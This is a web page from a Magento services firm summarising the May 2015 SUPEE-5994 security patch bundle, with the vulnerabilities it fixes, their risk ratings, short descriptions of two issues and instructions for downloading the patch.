Magento Security Patches
Security Updates and News
- Magento Security Patch 2.2.1, 2.1.10 and 2.0.17 Update
- Magento 2.0.6 Security Update
- Magento 2.0.4 Security Update
- Magento 2.0.16 and 2.1.9 Security Update
- Magento 2.0.14 and 2.1.7 Security Update
- Magento Security Update 2.0.10 and 2.1.2
- SUPEE-6788 Address Zend Framework Vulnerability Update
- Magento Security Patch 2.0.1 Update
- SUPEE-6788 Technical Details
Magento Security Patch SUPEE-5994
The Magento Security Patch SUPEE-5994 eight-patch bundle was released on May 14, 2015 to apply solutions to several security issues. The current editions of Magento Commerce and Open Source include this patch. Older versions of Magento products require this update. Learn more about the issues addressed and where to get this update below.
Benefits of Magento Security Patch SUPEE-5994 Bundle
Security Patch SUPEE-5994 bundle solves several security risks, including:
- Cross-site Scripting: Magento Downloader (APPSEC-979)
- Code Injection in Spreadsheet Formulas (APPSEC-978)
- Cross-site Scripting: Authorize.net (APPSEC-907)
- Admin Path Disclosure (APPSEC-977)
- Information Leak: Checkout (APPSEC-945)
- Information Leak: Recurring Profile (APPSEC-926)
- Local Path Disclosure (APPSEC-965)
- Overwritten System Files (APPSEC-535)
The Magento Security Patch SUPEE-5994 bundle was issued to solve security issues along multiple vectors. These areas include leaking information, code injection, and unintentional path disclosures.
All vendors should use industry best practices in security. Keeping sites up-to-date with upgrades and new patches provides the best protection available.
To acquire the Magento Security Patch SUPEE-5994 bundle:
Go to the portal and select Technical Resources, followed by Download located on the Commerce panel. Next, select Magento Commerce Edition > Patches and Support and open the folder named “Security Patches – May 2015.”
- Magento Commerce Edition Vendors
For Magento Commerce Edition users, access your account page, click on Downloads, and select Magento Commerce Edition > Support patches. Next, look for the “Security Patches – May 2015” folder to download the latest patch. As more recent versions of Commerce Edition include this patch, Forix also recommends upgrading.
- Magento Open Source Edition Vendors
You can find security patches for all previous versions of Magento Open Source Edition on the download page (search for SUPEE-5994). Alternatively, if you choose to upgrade to a current Open Source Edition, you will get this update automatically.
The following is a list of solutions included in the Magento Security Patch SUPEE-5994 bundle.
- Cross-site Scripting: Magento Downloader (APPSEC-979) – Risk Rating: 8.2 High
- Code Injection in Spreadsheet Formulas (APPSEC-978) – Risk Rating: 6.1 Medium
This exploit allows attackers to input a formula in a Microsoft Excel spreadsheet. Once executed, this formula can change data, steal personal data, or execute remote code. This formula triggers a warning, which a user simply clicks dismiss to activate.
- Cross-site Scripting: Authorize.net (APPSEC-907) – Risk Rating: 6.1 Medium
- Information Leak: Checkout (APPSEC-945) – Risk Rating: 5.3 Medium
This attack exposes addresses, names, and phone numbers to theft. An attacker can gain access to this information by creating an account with a sequential ID, adding a product in the cart, and proceeding to checkout.
Install the Magento Security Patch SUPEE-5994 Bundle Today
Forix urges vendors to upgrade to a more recent version or to install the Magento Security Patch SUPEE-5994 bundle today to protect storefronts from attack. Forix offers customer support with installing this patch to guarantee a smooth, trouble-free transition.